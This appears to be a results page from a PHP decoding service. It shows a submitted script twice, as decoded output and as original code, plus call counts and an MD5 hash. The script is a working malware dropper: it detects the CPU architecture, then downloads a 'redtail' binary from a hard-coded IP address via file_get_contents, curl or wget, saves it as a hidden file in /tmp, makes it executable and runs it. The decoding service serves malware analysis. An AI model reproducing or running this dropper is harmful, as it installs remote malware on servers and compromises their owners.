Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686"..

Decoded Output download

<?  function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686")!==false){return "i686";}if(strpos($s,"aarch64")!==false||strpos($s,"arm8")!==false){return "arm8";}if(strpos($s,"arm7")!==false){return "arm7";}return "x86_64";}$a=b();$u=get_current_user();$p="/tmp/$u";if(!file_exists($p)){mkdir($p,0744,true);}$p="/tmp/$u/.redtail";if(file_exists($p)){shell_exec("rm -rf $p");}$f=fopen($p,"wb");if(filter_var(ini_get("allow_url_fopen"),FILTER_VALIDATE_BOOLEAN)){$b=file_get_contents("http://45.95.147.236/download/redtail.$a");fwrite($f,$b,strlen($b));}else{if(function_exists("curl_init")){$h=curl_init("http://45.95.147.236/download/redtail.$a");curl_setopt($h,CURLOPT_FILE,$f);curl_exec($h);curl_close($h);}else{fclose($f);shell_exec("cd /tmp/$u; wget http://45.95.147.236/download/redtail.$a -O .redtail; chmod +x .redtail; ./.redtail");exit();}}fclose($f);shell_exec("cd /tmp/$u; chmod +x .redtail; ./.redtail");exit(); ?>

Did this file decode correctly?

Original Code

function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686")!==false){return "i686";}if(strpos($s,"aarch64")!==false||strpos($s,"arm8")!==false){return "arm8";}if(strpos($s,"arm7")!==false){return "arm7";}return "x86_64";}$a=b();$u=get_current_user();$p="/tmp/$u";if(!file_exists($p)){mkdir($p,0744,true);}$p="/tmp/$u/.redtail";if(file_exists($p)){shell_exec("rm -rf $p");}$f=fopen($p,"wb");if(filter_var(ini_get("allow_url_fopen"),FILTER_VALIDATE_BOOLEAN)){$b=file_get_contents("http://45.95.147.236/download/redtail.$a");fwrite($f,$b,strlen($b));}else{if(function_exists("curl_init")){$h=curl_init("http://45.95.147.236/download/redtail.$a");curl_setopt($h,CURLOPT_FILE,$f);curl_exec($h);curl_close($h);}else{fclose($f);shell_exec("cd /tmp/$u; wget http://45.95.147.236/download/redtail.$a -O .redtail; chmod +x .redtail; ./.redtail");exit();}}fclose($f);shell_exec("cd /tmp/$u; chmod +x .redtail; ./.redtail");exit();

Function Calls

b 1
shell_exec 1

Variables

None

Stats

MD5 a678e77319c0a71ab742e5b604ecf159
Eval Count 0
Decode Time 61 ms